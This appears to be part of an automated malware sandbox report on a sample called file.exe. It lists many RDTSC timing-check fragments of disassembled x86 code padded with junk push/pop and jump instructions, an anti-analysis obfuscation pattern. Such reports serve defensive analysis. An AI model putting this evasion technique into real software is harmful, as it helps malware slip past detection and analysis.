Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61A3D second address: B61A60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAAC4EC6A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FAAAC4EC6B4h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61E1A second address: B61E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61E1E second address: B61E3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B2h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007FAAAC4EC6ACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B61E3E second address: B61E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jc 00007FAAAC4EBB26h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B638C2 second address: B638C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B638C8 second address: B638CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B638CE second address: B638E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66403 second address: B6641D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 js 00007FAAAC4EBB2Ch 0x0000000f jbe 00007FAAAC4EBB26h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B665DD second address: B665F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B665F2 second address: B665F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B666A9 second address: B66712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jno 00007FAAAC4EC6B8h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FAAAC4EC6A8h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 sbb dl, FFFFFFC2h 0x0000002b mov dword ptr [ebp+122D2D13h], edx 0x00000031 mov edx, dword ptr [ebp+122D29A5h] 0x00000037 push 00000004h 0x00000039 mov dword ptr [ebp+122D2CBFh], esi 0x0000003f call 00007FAAAC4EC6A9h 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66712 second address: B6672A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6672A second address: B6672F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6672F second address: B6674A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAAAC4EBB26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FAAAC4EBB26h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6674A second address: B6674E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B6674E second address: B66771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EBB38h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B66771 second address: B66777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68240 second address: B68251 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B68251 second address: B68274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007FAAAC4EC6B4h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FAAAC4EC6A6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B69C86 second address: B69CB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007FAAAC4EBB26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007FAAAC4EBB26h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 jmp 00007FAAAC4EBB30h 0x0000001b pushad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E86 second address: 5370E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E8A second address: 5370E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E8E second address: 5370E94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370E94 second address: 5370EFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx esi, dx 0x0000000e pushfd 0x0000000f jmp 00007FAAAC4EBB33h 0x00000014 sbb ah, FFFFFFFEh 0x00000017 jmp 00007FAAAC4EBB39h 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FAAAC4EBB31h 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FAAAC4EBB2Dh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350123 second address: 5350160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FAAAC4EC6ACh 0x00000011 or cx, 3ED8h 0x00000016 jmp 00007FAAAC4EC6ABh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350160 second address: 5350164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350164 second address: 53501AA instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FAAAC4EC6ACh 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007FAAAC4EC6B8h 0x0000001a sbb esi, 33078398h 0x00000020 jmp 00007FAAAC4EC6ABh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501AA second address: 53501CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a jmp 00007FAAAC4EBB31h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501CE second address: 53501D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501D2 second address: 53501D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501D8 second address: 53501DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501DE second address: 53501E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501E2 second address: 53501E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53501E6 second address: 535021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FAAAC4EBB38h 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FAAAC4EBB2Ah 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535021A second address: 5350229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5350229 second address: 5350241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EBB34h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B85 second address: 5370B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370B9D second address: 5370BA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BA1 second address: 5370BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EC6B3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BBF second address: 5370BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EBB2Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370BEE second address: 5370C0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C0B second address: 5370C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C11 second address: 5370C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAC4EC6B0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C31 second address: 5370C40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C40 second address: 5370C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAAC4EC6B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370C58 second address: 5370C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370794 second address: 53707AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707AB second address: 53707CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707CE second address: 53707D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 2145319Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53707D8 second address: 5370857 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FAAAC4EBB31h 0x00000010 pushfd 0x00000011 jmp 00007FAAAC4EBB30h 0x00000016 xor cl, 00000018h 0x00000019 jmp 00007FAAAC4EBB2Bh 0x0000001e popfd 0x0000001f pop eax 0x00000020 mov ecx, ebx 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 push ecx 0x00000028 pop edx 0x00000029 pushfd 0x0000002a jmp 00007FAAAC4EBB38h 0x0000002f sub eax, 463382A8h 0x00000035 jmp 00007FAAAC4EBB2Bh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370857 second address: 53708CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FAAAC4EC6AFh 0x00000009 xor esi, 22FAC7EEh 0x0000000f jmp 00007FAAAC4EC6B9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FAAAC4EC6B8h 0x00000021 sub cl, FFFFFF98h 0x00000024 jmp 00007FAAAC4EC6ABh 0x00000029 popfd 0x0000002a movzx eax, bx 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FAAAC4EC6AEh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538030A second address: 538037F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c call 00007FAAAC4EBB2Ch 0x00000011 pushfd 0x00000012 jmp 00007FAAAC4EBB32h 0x00000017 jmp 00007FAAAC4EBB35h 0x0000001c popfd 0x0000001d pop esi 0x0000001e mov eax, edi 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007FAAAC4EBB2Ah 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FAAAC4EBB2Dh 0x00000030 pop ecx 0x00000031 mov al, dh 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538037F second address: 5380384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53903E0 second address: 539045D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FAAAC4EBB2Ch 0x00000010 pushfd 0x00000011 jmp 00007FAAAC4EBB32h 0x00000016 or al, 00000038h 0x00000019 jmp 00007FAAAC4EBB2Bh 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FAAAC4EBB39h 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FAAAC4EBB38h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539045D second address: 5390461 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390461 second address: 5390467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390467 second address: 53904F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 pushfd 0x00000007 jmp 00007FAAAC4EC6B9h 0x0000000c or eax, 149CE396h 0x00000012 jmp 00007FAAAC4EC6B1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007FAAAC4EC6AEh 0x00000022 mov eax, dword ptr [ebp+08h] 0x00000025 jmp 00007FAAAC4EC6B0h 0x0000002a and dword ptr [eax], 00000000h 0x0000002d jmp 00007FAAAC4EC6B0h 0x00000032 and dword ptr [eax+04h], 00000000h 0x00000036 pushad 0x00000037 jmp 00007FAAAC4EC6AEh 0x0000003c mov dx, si 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904F6 second address: 53904FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53904FA second address: 5390500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390500 second address: 5390506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390506 second address: 539050A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53705C1 second address: 5370611 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FAAAC4EBB30h 0x00000008 or ax, 2578h 0x0000000d jmp 00007FAAAC4EBB2Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FAAAC4EBB36h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FAAAC4EBB2Dh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370611 second address: 5370615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5370615 second address: 537061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537061B second address: 5370621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 539003C second address: 5390040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5390040 second address: 5390046 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07B2 second address: 53B07CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07CD second address: 53B07D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07D3 second address: 53B07F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EBB39h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07F7 second address: 53B07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B07FD second address: 53B081B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAAC4EBB32h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B081B second address: 53B0821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0821 second address: 53B0825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0825 second address: 53B0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0829 second address: 53B0865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FAAAC4EBB2Bh 0x00000012 adc ecx, 2B8C77AEh 0x00000018 jmp 00007FAAAC4EBB39h 0x0000001d popfd 0x0000001e movzx ecx, bx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0865 second address: 53B088F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAAC4EC6B7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B088F second address: 53B08C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [775165FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FAAAC4EBB2Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B08C0 second address: 53B08E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bh, 4Dh 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A0D second address: 53B0A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, E3h 0x0000000d mov edx, 68F77A24h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FAAAC4EBB2Ah 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A37 second address: 53B0A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A3B second address: 53B0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53B0A3F second address: 53B0A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx esi, di 0x0000000b rdtsc
